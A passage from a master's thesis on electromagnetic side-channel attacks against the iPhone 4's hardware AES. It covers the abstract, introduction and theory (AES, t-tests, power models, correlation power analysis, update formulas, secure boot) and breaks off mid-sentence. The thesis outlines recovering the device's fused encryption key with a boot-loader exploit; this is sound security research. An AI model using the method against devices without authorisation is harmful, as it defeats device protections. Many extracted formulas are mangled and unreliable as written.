EM Side-channel Analysis on Smartphone Early Boot Encryption

Oleksiy Lisovets

Master’s Thesis. June 1, 2020. Chair for Security Engineering – Priv.-Doz. Dr. Amir Moradi Advisor: David Knichel

Abstract

Modern smartphones often implement boot component encryption in order to add an obstacle for attackers who want to analyse and possibly exploit the device. This gives a false sense of security, as obscurity through encryption does not protect against vulnerabilities. In this thesis EM side-channel is used to analyse the hardware AES implementation of a smartphone and to recover the hardware fused encryption key. Therefore, a BootROM exploit is used to deploy a payload in boot loader context, which allows communicating with the hardware AES engine. Furthermore, the payload is used to expose a low latency interface to the CPU by repurposing a hardware button to become a GPIO output, as well as to modify the crypto engine invokation function such that the exposed GPIO pin signals start and end of AES decryptions. This is then used as trigger signal which allows performing EM measurements for timing, SNR and correlation analysis, eventually leading to a CPA attack which recovers the hardware fused encryption key. The recovered key allows oine decryption of current and future firmware files for the target device model.

i

Eidesstattliche Erklärung

Ich erkläre, dass ich keine Arbeit in gleicher oder ähnlicher Fassung bereits für eine andere Prüfung an der Ruhr-Universität Bochum oder einer anderen Hochschule eingereicht habe.

Ich versichere, dass ich diese Arbeit selbständig verfasst und keine anderen als die ange- gebenen Quellen benutzt habe. Die Stellen, die anderen Quellen dem Wortlaut oder dem Sinn nach entnommen sind, habe ich unter Angabe der Quellen kenntlich gemacht. Dies gilt sinngemäß auch für verwendete Zeichnungen, Skizzen, bildliche Darstellungen und dergleichen.

Ich versichere auch, dass die von mir eingereichte schriftliche Version mit der digitalen Version übereinstimmt. Ich erkläre mich damit einverstanden, dass die digitale Version dieser Arbeit zwecks Plagiatsprüfung verwendet wird.

Ocial Declaration

Hereby I declare that I have not submitted this thesis in this or similar form to any other examination at the Ruhr-Universität Bochum or any other institution of university.

I ocially ensure that this paper has been written solely on my own. I herewith ocially ensure that I have not used any other sources but those stated by me. Any and every parts of the text which constitute quotes in original wording or in its essence have been explicitly referred by me by using ocial marking and proper quotation. This is also valid for used drafts, pictures and similar formats.

I also ocially ensure that the printed version as submitted by me fully confirms with my digital version. I agree that the digital version will be used to subject the paper to plagiarism examination.

Not this English translation but only the ocial version in German is legally binding.

Datum / Date Unterschrift / Signature

Contents

1 Introduction 1 1.1 Motivation ...... 2 1.2 Contribution ...... 2 1.3 RelatedWork...... 2 1.4 Organization of This Thesis ...... 3

2 Background 5 2.1 Advanced Encryption Standard ...... 5 2.1.1 AES Implementation ...... 6 2.2 Side-channelAnalysis ...... 7 2.2.1 Welch’st-test...... 8 2.2.2 Power Consumption of ICs ...... 9 2.2.3 PowerModel ...... 11 2.2.4 Signal-to-Noise Ratio ...... 11 2.2.5 DierentialPowerAnalysis ...... 12 2.2.6 TheEMSide-channel ...... 13 2.2.7 Update Formulas ...... 13 2.3 SecureBoot...... 18

3Setup 19 3.1 TargetDevice...... 19 3.2 MeasurementSetup ...... 21 3.3 Computations ...... 21

4 Boot Loader Code Execution and AES Engine Access 23 4.1 Entrypoint ...... 23 4.1.1 Preparation of Images ...... 23 4.1.2 Payload Execution ...... 24 4.2 Payload Creation ...... 24 4.3 PayloadDescription ...... 25 4.3.1 Payload Entrypoint ...... 25 4.3.2 Main Function ...... 25 4.3.3 AES Hook ...... 26 4.3.4 Command Handlers ...... 28 4.3.5 Helper Functions ...... 28

5 AES Side-channel Analysis 29 5.1 AESEngineModes...... 29 iv Contents

5.2 AESTiming...... 29 5.3 InitialProbePlacement ...... 31 5.4 Non-Specifict-test ...... 31 5.5 Signal-to-Noise Ratio ...... 32 5.6 AESCPAPowerModels...... 35 5.7 LeakingPowerModel ...... 35 5.8 Evaluating Smaller Power Models ...... 36 5.9 FullChipScan ...... 37 5.10 AES CPA Attack ...... 38 5.10.1 CPAWithKnownKey ...... 38 5.10.2 CPA on Target Key ...... 40

6 Tooling 55 6.1 Alignment of Traces ...... 55 6.1.1 Manual Alignment ...... 55 6.1.2 Automatic Full Chip Scan Alignment ...... 56 6.2 Ecient Correlation Implementation ...... 57 6.2.1 Server ...... 57 6.2.2 Clients...... 58 6.2.3 OpenCLGPUClient...... 59

7 Conclusion 63 7.1 Summary ...... 63 7.2 FutureWork ...... 63

A Acronyms 65

BCode 67

List of Figures 97

List of Listings 99

Bibliography 101 1 Introduction

Secure Boot is a common mechanism used in modern smartphones to prevent loading code not authorized by the vendor in the early stages of the boot process. This creates a foundation to assure the integrity of the . Therefore, each component in the boot process is responsible to verify the next component before launching it, up until the kernel is booted[ios]. The root of trust is usually a small immutable piece of which is fused into hardware, also called BootROM. Exploiting a vulnerability in any of the components involved in the boot process lets an attacker fully compromise the system before it even started up, thus breaking every assumption the system has about its integrity. This allows to fully circumvent all mitiga- tions which are not yet initialized at that point in time, but would have been a problem at a later stage, such as Apples Kernel Text Readonly Region (KTRR), a mitigation which assures the immutability of the kernel, or ARMv8.3 Pointer Authentication which prevents code reuse attacks such as Return Oriented Programming (ROP). To harden examination, debugging and exploitation of these boot components by unauthorized parties, vendors sometimes choose to encrypt firmware components in addition to just cryptographically authenticate them. Therefore, usually a key is fused into the hardware, which is used to decrypt individual components during the boot sequence. This layer of obscurity does not protect against boot loader vulnerabilities, but adds an additional obstacle for an attacker, who now first needs to break the encryption before a vulnerability can be debugged and exploited. Physical attacks like side-channel analysis can be valuable tools to break security barriers on a level where software engineers cannot defend the system. In this thesis the applicability of Electro Magnetic (EM) side-channel attacks for recovering the hardware fused encryption keys is examined. 2 1 Introduction

1.1 Motivation

As a security researcher it would be beneficial to be able to analyse the code running on your device. This requires to bypass the encryption. In this thesis EM side-channel is used to analyse the concrete Advanced Encryption Standard (AES) implementation of the Apple iPhone 4, as well as to recover the hard- ware fused Group Identifier (GID) key which allows oine decryption of boot loader components, removing the need for having a physical device and boot loader software exploit. Since such an attack requires a decryption oracle which on its own would already be sucient to decrypt boot loaders, the goal here is to develop a method which can use a temporary decryption oracle, achieved by for example glitching the boot loader. This establishes a permanent unfixable primitive allowing to decrypt and analyse future firmwares for this device, which in turn can help to find and fix or exploit software vulnerabilities.

1.2 Contribution

This thesis evaluates the practical applicability of EM side-channel attacks on smartphones. Therefore, the hardware AES is analysed using timing analysis, t-test, Signal-to-Noise Ratio (SNR) and Correlation Power Analysis (CPA), allowing to recover the structure of the underlying implementation with a high confidence. Furthermore, the position on the System on Chip (SoC) with the greatest EM leakage is determined using a systematic approach. Finally, CPA is used to recover the GID key, which is fused into the Apple iPhone 4 SoC.

1.3 Related Work

Even though many people seem interested in recovering the GID key in order to perma- nently being able to decrypt firmware without the possession of a device and software exploit, there is not much publicly accessible research on this topic. A compilation of available resources can be found on theiphonewiki[Theb]. According to an article[Intc]byThe Intercept based on two documents leaked by Edward Snowden, the CIA was trying to retrieve the GID key using Dierential Power Analysis (DPA)[Intb] and by physically de-processing the chip[Inta] in 2012. However, until today there is no public information on anyone extracting a GID key and there is also no information available whether any private attempts where successful. The work in this thesis is most useful combined with glitching in order to achieve code execution in early boot stages. Practical applications of this were shown by Lu, who was able to get boot loader code execution in the PlayStation Vita using fault injection[Lu19]. Another practical application of glitching was shown by @derrek, 1.4 Organization of This Thesis 3

@nedwill and @naehrwert[@de16] at 33C3 in 2016, who glitched the Nintendo 3DS to bypass security protections at the highest privilege level. Schneider et al. provide a roadmap for side-channel evaluations[SM15], which can be used as a starting point when targeting a new device. Furthermore, Schneider et al. provide one-pass formulas[SMG15] for ecient parallel computation. This is especially useful for processing large amounts of data, which might be required for attacking a particular device. An alternative method for detecting side-channel leakage using the ‰2-Test is presented by Moradi et al.[MRSS18]. In addition to that, previous work by Moradi et al. evaluates practical attacks and countermeasures on reconfigurable hardware, which shows that attacks are indeed possible given enough traces and resources even with countermeasures in place, making it a viable attack vector for modern smartphones[MMP11]. Furthermore, Moradi et al. demonstrate a real-world attack against the bitstream encryption of Xilinx Virtex-4 and Virtex-5 o-the-shelf FPGAs, which is supposed to protect the intellectual property and to prevent fraud through cloning or manipulating a design or even implanting hardware Trojans[MKP12].

1.4 Organization of This Thesis

The thesis is organized by first giving an introduction to background knowledge in Chapter 2. Next, Chapter 3 presents the setup used in this thesis, including the target device and the modifications which were applied to it, measurement hardware like oscilloscope and probe as well as the computing hardware used to process the data. Afterwards, Chapter 4 explains what software needs to be executed on the target device and how to deploy it in order to create an accessible decryption oracle required for EM measurements. Chapter 5 deals with various dierent ways of analysing the target and what information can be gathered from each of them. Then, in Section 5.10 a CPA attack is performed in order to retrieve the hardware fused key from the target device. The algorithms and programs used to perform data processing are discussed in Chapter 6. Finally, Chapter 7 sums up the information retrieved about the target device and gives an outlook on future work.

2 Background

This chapter provides background knowledge required to follow the side-channel analysis in this thesis.

2.1 Advanced Encryption Standard

The Advanced Encryption Standard (AES) is a symmetric cryptographic algorithm standardised by the U.S. National Institute of Standards and Technology (NIST)in 2001[DR02]. It is a subset of the Rijndael block cipher, developed by Vincent Rijmen and Joan Daemen. AES encrypts 128-bit blocks with either a 128-bit, 192-bit or 256-bit key. The algorithm consists of a key schedule, an initial AddRoundKey step and 9, 11 or 13 rounds of: SubBytes, ShiftRows, MixColumns and AddRoundKey depending on the key length as well as an additional round lacking the MixColumns step. The 16 master key bytes are used as the first round key. In case of 192-bit or 256-bit AES, subsequent bytes are used for the second round key. Using the AES key schedule further key bytes are derived until there is a 16 byte round key for each round plus the initial AddRoundKey. The AES state is modeled by a 4x4 byte matrix which globally indexes the bytes column wise from left to right within the matrix and locally from top to bottom within the column. Given the plaintext as byte array p0, p1,...,p15, the initial data state of the AES is given as:

p0 p4 p8 p12 p p p p S = S 1 5 9 13T p2 p6 p10 p14 W X Wp p p p X W 3 7 11 15X The AddRoundKey step xors the roundU key bytewise toV the AES state. Afterwards, the SubBytes step replaces each byte, by using a non-linear 8-bit mapping referred to as Substitution Box (S-Box). Subsequently, ShiftRows permutates the position of the bytes in the matrix such that the individual rows are rotated to the left by their row index, counting from zero. This means the first row is not rotated, the second row is rotated to the left by one byte, the third row is rotated by two bytes and the last row is rotated by three bytes. Finally, MixColumns multiplies each column of the state matrix with a fixed multiplication matrix as shown below.

new0 2311 old0 new 3112 old S 1T = S T S 1T new2 1123ú old2 W X W X W X Wnew X W1231X Wold X W 3X W X W 3X U V U V U V 6 2 Background

This multiplication is performed in the Galois Field GF (28) using the irreducible polyno- mial x8 + x4 + x3 + x +1.

2.1.1 AES Implementation AES can be implemented in many dierent ways depending on the available resources and optimization goals. A few common implementation are described in the following.

2.1.1.1 Round Based The most straight forward approach is the round based implementation, where each step is implemented in one single circuit which is re-used in every round, as described in Section 2.1. An implementation in hardware usually follows one of the following two approaches: In the first one, a register is put after every step, which minimizes the critical path and allows to have a higher clock speed for the cost of additional hardware (registers). In the second one, a full round is computed in one clock cycle before the state is saved in a register. This slightly reduces the maximum possible clock speed due to a longer critical path, but also has a lower amount of required registers.

2.1.1.2 T-Table Another way of implementing AES is using T-Tables as described by the authors Daemen and Rijmen, which technically also is a round based implementation[DR02]. The idea is to create four 1-to-4 byte lookup tables which combine SubBytes, ShiftRows and MixColumns such that one column of a round can be written as:

s4Õ i+0 Ss4Õ i+1T = T0[s4i]+T1[s4(i+1)+1]+T2[s4(i+2)+2]+T3[s4(i+3)+3]+Kr[i] sÕ i W 4 +2X Ws X W 4Õ i+3X U V Here s denotes the old and sÕ the new state, Ti is the i-th T-Table and Kr is an array indexing 4 key bytes of the r-th round at a time. Furthermore, all indices to s are modulo 16, which was omitted in the formula for the sake of readability. This implementation is used when high performance is desired and large amounts of memory or physical space (in case of hardware implementation) are not an issue. One round needs 16 table lookups and 16 32-bit xor operations, but requires 4 4 256 = 4096 ú ú bytes of memory for the T-Tables.

2.1.1.3 Fully Unrolled Having a fully unrolled hardware implementation of AES means that there is a dedicated circuit for each step in every round. This allows having a full encryption in one single clock cycle, but serves several disadvantages. 2.2 Side-channel Analysis 7

One disadvantage is that due to a very long critical path, the clock speed needs to be low. Another is that a fully unrolled implementation consumes a lot of physical area on the chip. Furthermore, such an implementation is not very flexible, meaning it is not possible to switch between 128-bit, 192-bit and 256-bit key sizes (due to dierent amount of rounds) or encryption/decryption modes. It is possible to overcome the low clock speed issue by placing a register after every round. This allows having a high throughput if a lot of data needs to be encrypted with the same key, as this pipeline enables computing one encrypted block in every clock cycle after an initial latency of the amount of clock cycles required for one full encryption.

2.2 Side-channel Analysis

The AES cipher is said to be cryptographically secure, meaning there is currently no known attack breaking the mathematical properties in order to extract the key, even with an encryption/decryption oracle available. Individual implementation on the other hand can be vulnerable to attacks, even when the mathematical properties of a cipher are secure. Physical attacks exploit physical properties of a device, which can be divided into several categories as seen in Figure 2.1. This thesis will focus on passive non-invasive attacks, or more specific: side-channel attacks.

Passive Active Invasive Probing Forcing Permanent Faults Semi-Invasive Optical Inspection Light/Radiation Attacks Non-Invasive Side-channel Attacks Clock/Power/Temperature Glitching Attacks

Figure 2.1: Overview of Physical attacks

When a device is inspected while it processes data, i.e. during an encryption, an attacker may observe physical properties like the runtime of the particular implementation, the power consumption or EM emanations of the device during runtime or even the produced heat. These properties directly correlate with the processes on the device and can leak information about the internal state while the algorithm is executing. They are thus refered to as ‘side-channels’. If for example the runtime of an operation depends on a secret value, it might be possible to measure the time to gain information about that value. This is called a timing side-channel attack. Another example is that when a value in memory is replaced with a dierent value, the electrical circuit needs only to change its state if the new value is dierent from the old value, but not if the new value is the same as the old value. For example, if a 1 in memory is replaced with a 0 (or vice versa), more power is consumed, compared to the 8 2 Background

case where a 1 is replaced with a 1 (or 0 with 0). By measuring the power it might be possible to learn whether the value changed. This is called a power side-channel attack. The same principle applies to electromagnetic emanations, which directly correlate with the power consumption. When exploiting an EM side-channel, the electromagnetic emanations are measured rather than the power consumption. Due to the fact that the measured power consumption or electromagnetic emanation is not only influenced by informative data, called signal, but also by the environment and other unrelated processes, called noise, several statistical tools are used in order to filter out the noise and extract the signal from the measurements. The amount of useful signal that can be extracted highly depends on the implementation and the presence or absence of countermeasures. One countermeasure is hiding, which tries to decrease the SNR. This can be achieved by adding unrelated circuits processing random data, which will increase noise. Another countermeasure is masking, which attempts to hide leakage in higher statistical orders. The secret is split into multiple shares, by xoring it with a random value. For example, let x be the secret and r a random value. Then, one share is x = x r and the 1 ü other is x2 = r. Now both x1 and x2 are random values independent of the secret x on their own. The idea is to process both shares individually and combine them afterwards. For example, if f( ) is a linear function then f(x)=f(x x )=f(x ) f(x ) and · 1 ü 2 1 ü 2 therefore the shares can be processed individually.

2.2.1 Welch’s t-test The Welch’s t-test is a statistical hypothesis test which provides a quantitative value that the mean of two normal-distributed sets are dierent from each other[Wel47]. Using the t-test it is possible to examine the validity of the null hypothesis, stating that two sets are drawn from a normal distributed population with the same mean, and are thus not distinguishable by the mean. The value t is computed using the formula:

n n µ0 µ1 2 1 2 1 t = ≠ where ‡ = (xi µ) and µ = xi 2 2 n ≠ n ‡0 ‡1 i=1 i=1 n + n ÿ ÿ Ú 0 1

for two sets Q0 and Q1 with cardinality n0 and n1, the means µ0 and µ1 and variance 2 2 (where all values are equally likely) ‡0 and ‡1,respectively. In practical applications such as side-channel attacks, where both populations are large enough, a threshold of t > 4.5 is defined to reject the null hypothesis, as it leads to a | | confidence of >0.99999[SM15]. The Non-Specific t-test can be used for assessing leakage of a device in order to determine whether it might be exploitable. The idea is to measure the power consumption or EM emanation of two sets of encryptions, one with a fixed input and one where each measurement is done with a randomly varied input. Due to the fact that all intermediate values in the encryption are always the same for the same input, the power consumption should be similar when no countermeasures are implemented. 2.2 Side-channel Analysis 9

If the t-test yields rejection of the null hypothesis, then it is possible to distinguish the fixed input encryptions from random input encryptions solely by their power traces. That in turn means there is leakage which can possibly be exploited in order to recover the secret. A special measurement phase is needed, where the decision on encrypting a fixed or random input is based on a random coin toss. This is required because otherwise there might be dependencies not related to exploitable leakage, causing false positives in the t-test. If it is not possible to reject the null hypothesis using the first order t-test, higher-order testing can help detecting leakage in case countermeasures like masking are implemented. However, higher-order attacks are out of the scope of this thesis.

2.2.2 Power Consumption of ICs The power consumption of an (IC) can be divided into several com- ponents, where not every component is particularly interesting for the attacker. The total power consumption consists of the amount of power the device consumes when idle (Pconst) plus the amount of power which is dependent on the ICs instruction or data it processes (Pvar). The majority of today’s hardware is built using Complementary Metal-Oxide-Semiconductor (CMOS) technology, which consists of a pull-up network, connecting the output with power (Vdd ) and a pull-down network, connecting the output with ground (Vss). An example of a CMOS inverter is shown in Figure 2.2.

Figure 2.2: CMOS inverter[Wika]

When the circuit is in a stable state it consumes very little power. Although, even then there is a dierence in power consumption between dierent states. For example, if the input is low, the inverter connects Vout to Vdd. Since the transistors are not perfectly blocking, there is a small leaking current flow between Vdd and Vss. This issue becomes more relevant the smaller the technology becomes. Furthermore, whatever is connected to Vout will drain a little bit of energy from Vdd (when Vin is low), thus creating a very small current. This consumes more power in contrast to where Vout is connected to Vss. When the inverter changes its state, there is dynamic power consumption. For example, when Vout changes from low to high, then the circuit needs to be charged. This consumes 10 2 Background

more power than when Vout changes from high to low, in which case the circuit needs to be discharged. Another important eect is the result of short-circuit current, where a short circuit between Vdd and Vss is created as both transistors are conductive for a short period of time when the input signal switches. The overall power consumption can be modeled as Ptotal = Pconst + Pconst_expl + Pvar_expl + Pnoise. Using a statistical approach it is possible to overcome Pconst and Pnoise, where the latter is usually considered as a Gaussian normal distribution, in order to extract the exploitable part.

2.2.2.1 Glitches Glitches are unnecessary signal transitions without functionality, which occur when a circuit changes its state. When all inputs change at the same time (i.e. on a rising clock edge), some signals arrive slower at certain gates than others due to a longer physical path or more gates that need to be passed. Figure 2.3 shows a circuit consisting of two logic gates, namely an or gate and an and gate.

Figure 2.3: Logic gates[Wikb]

When for example the inputs (A =1, B =0, C =0) change to (A =0, B =0, C =1), signal C =1arrives at the and gate before AB holds the correct value. Thus, for a short period, the and gate sees the values AB =1and C =1, which causes the output O to be 1 for some time before it holds the correct value 0. Since the output was 0 in the previous clock cycle and is again 0 in the current clock cycle, the temporary transition to 1 was unnecessary. The larger the critical path is the more unnecessary transitions there are in a circuit before the output holds a stable value. This has no eect on correct functioning of the circuit, since the clock cycle is always long enough to let the signals propagate correctly before the output is used in the next cycle, however this causes the power consumtion to be much higher in a clock cycle where inputs change compared to a clock cycle where the inputs stay the same. Glitch power dissipation is 20%-70% of total power dissipation and thus should be considered for side-channel attacks. 2.2 Side-channel Analysis 11

2.2.3 Power Model When attacking an IC using power side-channels, the exploitable power consumption is often modeled using a so called power model to recover the ICs internal values by utilizing measurements of the power consumption during runtime. Given data stored in a register, two possible power models can be applied. The first one models the static power consumption, i.e. if the register stores a 1 it will consume more power compared to when it stores a 0 (or vice versa in case of a low active circuit). The other one models the power consumption on state transition, i.e. the moment the register gets updated with a new value. If the old value matches the new value, less power is consumed for transitioning between the states, compared to the case where the values are dierent. This is because of the high number of glitches, where the circuit needs to be (dis-)charged several times. In order to recover a one byte value from a register using power traces, a hypothetical power consumption is created for each value and compared to the real trace. The hypothetical power consumption being closest to the real trace is most likely the one yielding the correct internal value. Applying this to the previously given example, the power model would either be the hamming weight of the value or hamming distance between the old and the new value.

2.2.4 Signal-to-Noise Ratio

The Signal-to-Noise Ratio (SNR) provides a way to find the points in time where Pexp is largest and thus most promising for an attack. The general definition is

Var(Signal) V AR(P ) SNR = , which in the given context translates to SNR = exp Var(Noise) V AR(Pnoise)

When attacking an implementation, the SNR can be used to determine how much and at what point in time a specific power model (see Section 2.2.3) leaks. Therefore, the traces are separated into groups based on the power model. If for example the 8-bit hamming weight of the first plaintext byte is used as a power model, the traces are divided into 9 groups according to that model. Then, the SNR at each point in time for the trace is computed as

2 ngroups ‡means 1 2 SNR = with µvariances = ‡gi and µvariances ngroups ÿi=1

ngroups ngroups 2 1 2 1 ‡means = (µgi µmeans) while µmeans = µgi ngroups ≠ ngroups ÿi=1 ÿi=1 2 Here µgi and ‡gi are being the mean and variance of group i, respectively, at a single point in time over all traces. 12 2 Background

2.2.5 Dierential Power Analysis Dierential Power Analysis (DPA) published by Kocher et. al in 1999 is a statistical approach to exploit the data dependent part of the power consumption[KJJ99]. The idea of the attack is to analyse the power consumption at a fixed moment in time for dierent inputs. Each point in time is considered independently, which allows not only to recover the secret, but also the point in time that an intermediate value is processed on the device. Similar to evaluating the SNR, a power model is required to perform a DPA attack, depending on which only a small subset of the key space is considered at a time. The key is usually recovered either bytewise or in small groups of 2 or 4 bytes at once.

2.2.5.1 Classical Dierential Power Analysis In classical DPA traces are divided into groups based on a power model and key candidate. Then, the mean is computed for each point in time on the trace for each of those groups. The general idea is that for an incorrect key candidate the traces are grouped randomly such that the means in the individual groups are similar, resulting in a low variance of means. If an accurate power model is selected, the right key guess will lead to a sorting with distinguishable means. For example, when using the hamming weight as power model, traces where a value with higher hamming weight is processed are expected to consume more power than traces where a value with lower hamming weight is processed. This will be reflected by the mean power consumption of the groups if the traces are grouped correctly. In that case the variance of means is higher than the variance of means of randomly grouped traces.

2.2.5.2 Correlation Power Analysis A more recent variant is Correlation Power Analysis (CPA), which uses hypothetical power consumptions, rather than splitting up the traces into groups. For each key guess, this creates a hypothetical power consumption for each trace, which is then correlated with the real power consumption. Again, the idea is that the correct key candidate yields a hypothetical power consumption which correlates much better than hypothetical power consumptions generated based on wrong candidates. Therefore, the Pearson correlation coecient which determines the linear dependency between two random variables yielding a value between 1 and 1[BCHC09], is used. It ≠ is computed by dividing the covariance of two sets by the product of their standard derivation: cov(X, Y ) n (X X¯)(Y Y¯ ) fl = = i=1 i ≠ i ≠ ‡X ‡Y nq(X Y¯ )2 n (Y Y¯ )2 i=1 i ≠ i=1 i ≠ Òq Òq For the attack a key candidate with high absolute correlation is an indicator for a correct guess, while a correlation value close to zero suggests an incorrect guess. 2.2 Side-channel Analysis 13

2.2.6 The EM Side-channel

Side-channel attacks like Simple Power Analysis (SPA) and Dierential Power Analysis (DPA) by Kocher et al. have been exploiting the power consumption since 1999[KJJ99]. However, sometimes the power side-channel is unavailable due to countermeasures or other practical obstacles. The EM side-channel provides a more powerful alternative to the classical power side-channel, which can sometimes be exploited even in presence of power side-channel countermeasure. While the power side-channel provides only a single aggregated view of the circuits power consumption, the EM side-channel can be used to inspect various signals at dierent frequencies. Furthermore, by carefully chosing a probe position, it is possible to focus on only one specific area on the circuit and to ignore unrelated processes happening at other physical locations. Agrawal et al. divide EM emanations into two categories[AARR03], as described in the following. Direct emanations result from intentional current flows, usually consisting of short bursts of current observable over a wide frequency band. In order to get good results with direct emanations, tiny field probes need to be positioned very close to the signal source, which might require decapsulating the chip packaging. Unintentional emanations are caused by electrical and electromagnetic coupling between components in close proximity. They are the most interesting for this thesis. The eect is amplified by capacitors and capacitance of power lines, as they emanate a stronger signal when their charge changes compared to emanations of logic gates and data lines.

2.2.7 Update Formulas

When further processing a large scale measurement, available resources like Random Access Memory (RAM) or computing power pose a limit for computing correlation using standard formulas. A solution to this problem are incremental and pairwise update formulas[SMG15], which provide an ecient, scaleable and parallelizable way of computing the mean, variance and correlation.

2.2.7.1 Incremental Mean Update Formula

The standard formula for computing the mean is

1 n µ = x Q n i ÿi=1 If we add a new element to the set without updating the mean, the old mean is computed as

n 1 1 ≠ µQ = xi n 1 ≠ ÿi=1 14 2 Background

We call the updated mean

n n 1 1 1 ≠ µÕ = x = ( x + x ) Q n i n i n ÿi=1 ÿi=1 Next, the equation of the old mean is written as

n 1 ≠ x =(n 1)µ i ≠ Q ÿi=1 and inserted into the new mean equation resulting in 1 µÕ = ((n 1)µ + x ) Q n ≠ Q n By applying the transformation 1 1 nµ µ + x µ x ((n 1)µ + x )= (nµ µ + x )= Q + ≠ Q n = µ Q ≠ n n ≠ Q n n Q ≠ Q n n n Q ≠ n we get the incremental update formula µÕ = µ for =µ x Q Q ≠ n Q ≠ n

2.2.7.2 Incremental Variance Update Formula The standard formula for computing the variance is

1 n ‡2 = (x µ )2 Q n i ≠ Q ÿi=1 However, in order to create an incremental update formula, we will use the first central moment instead, which is defined as

n s2 = (x µ )2 Q i ≠ Q ÿi=1 Following the same procedure as before we get

n 1 ≠ s2 = (x µ )2 Q i ≠ Q ÿi=1 if we add one element to the set, but do not update the central moment or the mean. Thus, to get the new central moment we write

n n 1 2 2 ≠ 2 2 s = (xi µQ ) = (xi µQ ) +(xn µQ ) QÕ ≠ Õ ≠ Õ ≠ Õ ÿi=1 ÿi=1 2.2 Side-channel Analysis 15

From Section 2.2.7.1 we know that µQÕ can be written as µ = µ with =µ x QÕ Q ≠ n Q ≠ n By inserting that into the central moment formula, we get

n 1 2 ≠ 2 2 s = (xi µQ + ) +(xn µQ + ) QÕ ≠ n ≠ n ÿi=1 n 1 ≠ = ((x µ )2 + 2(x µ ) +( )2)+(x µ + )2 i ≠ Q i ≠ Q n n n ≠ Q n ÿi=1 n 1 n 1 ≠ ≠ = (x µ )2 + 2(x µ ) +(n 1)( )2 +(x µ + )2 i ≠ Q i ≠ Q n ≠ n n ≠ Q n ÿi=1 ÿi=1 n 1 2 ≠ (n 1)2 = s2 + (x µ )+ ≠ +( (µ x )+ )2 Q n i ≠ Q n2 ≠ Q ≠ n n ÿi=1 Next, we insert

n 1 2 ≠ (µ x )=and (x µ )=0 Q ≠ n n i ≠ Q ÿi=1 This results in (n 1)2 s2 = s2 +0+ ≠ +( )2 QÕ Q n2 n ≠ which we transform to (n 1)2 n s2 = s2 + ≠ +( )2 QÕ Q n2 n ≠ n (n 1)2 (1 n) = s2 + ≠ +( ≠ )2 Q n2 n (n 1)2 (1 n)22 = s2 + ≠ + ≠ Q n2 n2 (n 1)2 +(1 2n + n2)2 = s2 + ≠ ≠ Q n2 (n2 n)2 = s2 + ≠ Q n2 2(n 1) = s2 + ≠ Q n Thus, we get the incremental formula

2(n 1) s2 = s2 + ≠ QÕ Q n 16 2 Background

for the central moment, which can be used in place of the variance during online computations. The variance can be retrieved from the central moment at any time by dividing by the number of elements in the set

1 ‡2 = s2 Q n Q

Finally, we need to proof

n 1 2 ≠ (x µ )=0 n i ≠ Q ÿi=1 Therefore, we show

n 1 ! ≠ 0 = (x µ ) i ≠ Q ÿi=1 n 1 n 1 ≠ ≠ = x µ i ≠ Q ÿi=1 ÿi=1 n 1 1 ≠ =(n 1) xi (n 1)µQ ≠ n 1 ≠ ≠ ≠ ÿi=1 n 1 1 ≠ =(n 1)( xi µQ) ≠ n 1 ≠ ≠ ÿi=1

Since in our notation QÕ = Q xn with n = QÕ ,wehave Q = n 1 and thus the old n 1 fi | | | | ≠ 1 ≠ mean is µQ = xi. By inserting this into our previous formula we get n 1 ≠ ÿi=1 n 1 1 ≠ (n 1)( xi µQ)=(n 1)(µQ µQ)=0 ≠ n 1 ≠ ≠ ≠ ≠ ÿi=1 and thus indeed the equation is zero. ⇤

2.2.7.3 Pairwise Mean Update Formula

A generalized version of the incremental update formula from Section 2.2.7.1 is the pairwise update formula

n22,1 µÕ = µ with = µ µ Q Q1 ≠ n 2,1 Q2 ≠ Q1 which allows to combine separately computed means of two sets QÕ = Q Q with the 1 fi 2 new cardinality n = n1 + n2. 2.2 Side-channel Analysis 17

1 n To proof this formula we insert the definition of the mean µ = x to get Q n i ÿi=1

n1 1 n2 1 n1 1 n2( xQ2,i xQ1,i) n2 i=1 ≠ n1 i=1 µQÕ = xQ1,i + n1 q n1 + n2 q ÿi=1 n1+n2 n1 n2 n2 n2 n1 i xQ1,i i xQ2,i i xQ1,i) = n1 =1 + n2 =1 ≠ n1 =1 n1q+ n2 q n1 + n2q n1 n2 n1 n2 n2 n1 ( + ) i xQ1,i + i xQ2,i i xQ1,i) = n1 n1 =1 =1 ≠ n1 =1 q n1q+ n2 q n1 n1 n2 n1 1 n2 n2 = ( xQ1,i + xQ1,i + xQ2,i xQ1,i) n1 + n2 n1 ≠ n1 ÿi=1 ÿi=1 ÿi=1 ÿi=1 This results in

1 n1 n2 µQÕ = ( xQ1,i + xQ2,i) n1 + n2 ÿi=1 ÿi=1 which is the definition of the mean for the set QÕ = Q Q with n = n + n elements. 1 fi 2 1 2 ⇤

2.2.7.4 Pairwise Variance Update Formula Similar to Section 2.2.7.2 the first central moment is again used for online computation rather than the variance. The generalized version of the incremental formula is

2 2 2 2 2,1 s = s + s + n1n2 with 2,1 = µQ µQ QÕ Q1 Q2 n 2 ≠ 1 The proof for the formula is out of scope of this thesis, although it can be easily seen that the formula reduces to the incremental formula when Q =1. An example is given | 2| below:

1 (µ µ )2 s2 s2 x µ n Q2 ≠ Q1 QÕ = Q1 + ( Q2,i Q2 )+ 1 1 ≠ ú ú n1 +1 ÿi=1 1 2 2 (xQ2,1 µQ1 ) = sQ1 + (xQ2,i xQ2,1)+n1 ≠ ≠ n1 +1 ÿi=1 2 2 (xQ2,1 µQ1 ) = sQ1 +0+n1 ≠ n1 +1 Thus, the same as the incremental formula in Section 2.2.7.2. Note that µ = x since Q = x . Q2 Q2,1 2 { Q2,1} 18 2 Background

2.3 Secure Boot

The Apple iPhone 4 implements a secure boot mechanism to establish a boot-chain-of- trust which starts at the BootROM and works its way up to the operating system kernel and even further to application level. Here we are going to focus only on the first boot components relevant to our side-channel analysis. On power on, the BootROM, which is an immutable piece of software fused into the SoC, is executed. This is the root of the trust chain. The BootROM functionality is kept minimal as it is the most trusted code and a vulnerability in the BootROM cannot be fixed with a software update. Its task is to load, validate and execute the first stage boot loader either from Non-Volatile Random Access Memory (NVRAM) or over Universal Serial Bus (USB). Latter is used in case former fails or the user enters Device Firmware Upgrade (DFU) mode using a special button combination. The first stage boot loader is also relatively small. It runs in Static Random Access Memory (SRAM) with its main responsibility being to initialize low level hardware components such as Dynamic Random Access Memory (DRAM) and to load, validate and execute the next stage boot loader. The second stage boot loader is executing in DRAM and thus has much more memory available to work with. It initializes more hardware components such as the screen. Furthermore, it loads several components like the boot logo, the devicetree[Thea] and a ramdisk (in case of a recovery/update boot). Lastly, the second stage boot loader loads, validates, initializes and executes the 